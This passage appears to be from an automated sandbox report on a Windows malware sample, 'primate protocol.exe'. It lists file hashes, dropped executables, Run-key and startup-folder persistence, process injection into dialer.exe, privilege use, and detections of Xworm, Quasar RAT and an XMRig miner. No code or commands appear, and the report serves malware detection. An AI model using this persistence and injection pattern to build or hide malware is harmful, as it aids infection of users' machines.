| SHA256 | c95e3888ecc710ae7446109296f1aabfd46beee7f8a564ca93024b410af77c85 |
| SHA512 | 9c98f4bfb3d98fa49659ee59e83b0d7465631f902769a412db3586e7a0148dd24eacc83c4428e48ff4726909e72cbf12cc31ff277b0df58fbb951b32244cd0f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe594472.TMP
| MD5 | 1a0a456f856873a5a9309edce3fab473 |
| SHA1 | b92d8b78a34ab62e40fff4005b49474881fbe3b6 |
| SHA256 | 03c3497adcbeabdccf628f44b1177f89f94879a5a773ffaf0bedfba6e29ee60e |
| SHA512 | c8d344bd9f7297f88ce61dd28e5c5a2b9ac0f3d4ba074d7a576ea711914de9027677d58c547fdac58ee45216945b44e6d91293b42256ff819f035749b042fc46 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8f8d03cca457b9c2f8d0167411ddbe73 |
| SHA1 | c141c820fedc664b81655efe9a045b9d229a016e |
| SHA256 | 03f76d380b89410221fc5ffa00d2f335bdaf09359fee8495349e36924dfac214 |
| SHA512 | 9cc003af1410d6c3ba6af018aef8d7df2058b7686be0343fd2fa179fcb4b75ee23541f041d36213f3ec2c18c71826cd91d94433278f724f8093b65b4e0715e76 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 70a873ad9a8fd76dd48ed67b696206e2 |
| SHA1 | c424ff332aef2d8c490db3416b2895378b565251 |
| SHA256 | b2a76595f7bbcf3c8cf3705fc9cf5edb5adb318cec0f46bcaf3686aa8cc56b4d |
| SHA512 | 5b2d5761d8711613098d8bd9755a38a5885ea26d79a05f13bd3bd9272ee36abecdc23d207a6085f87601851b56dd9a48668618b9f4827d9c99f0312299988bc5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3cd06142a6586b107f2d183974b05df4 |
| SHA1 | 2314946576fa7a69502637715e661f1018556f19 |
| SHA256 | 279933b64d87df5d6ca9b098431c606594e52d025a0bcffc5430055ca1d41b84 |
| SHA512 | 0c959f0436220350e294d86724c885da0a7ae08249acad29db5846c605b65ab379eaf51f5e52728518a71e6436dbad8dd8103e85a3d059322eeb0ed3567a6556 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 41a7f079e85c2a4f54e1052247b077a3 |
| SHA1 | 9afc19e2362b26cdaa9bf0edf833fa921f94aedb |
| SHA256 | 96bac7a7fe2f09187e96e566d0cc74c18d52c5581091b10bd4e12979e4b682d7 |
| SHA512 | 7ac203a83e3f0fd6eb3a39a753f715e9f22247dd3cc55dfa01107926d4a780a4d92eb40a396dd55593c68010661d31a8f63447fa5c5d63a48c5c79c4de9576b5 |
memory/5876-2431-0x0000000000220000-0x000000000028A000-memory.dmp
memory/1060-2505-0x0000000000DC0000-0x0000000000DCA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg
| MD5 | f1c3f0c151b4b375a7b6f0a934b9e0d2 |
| SHA1 | e1550ea133d153e7e13ddeb6a7ed19fd1c2ce22c |
| SHA256 | 7c7f38ad559e020bf8843ab9c5413acc3ab42786054a7c56d0c1b6e84ce5d75c |
| SHA512 | 8bc1791dcbd7aa19ace144fe7d7b997d2f41e98c4c7cac1206254b393e591ffef6d7ccc19de055c96558641e22fc9aeb2954f269da83068473309c0388b7d77d |
memory/3880-2681-0x00007FF973520000-0x00007FF973FE1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-03 16:15
Reported
2025-05-03 16:18
Platform
win11-20250502-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5316 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 908 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xmrig family
Xworm
Xworm family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
| N/A | N/A | C:\Windows\host.exe | N/A |
| N/A | N/A | C:\Windows\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" | C:\Windows\CompPkg.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3016 set thread context of 848 | N/A | C:\Windows\host.exe | C:\Windows\system32\dialer.exe |
| PID 1480 set thread context of 5008 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1480 set thread context of 5268 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1480 set thread context of 2336 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 5316 set thread context of 4636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 908 set thread context of 4396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\CompPkg.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\systemprocess.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\host.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\systemprocess.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\host.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
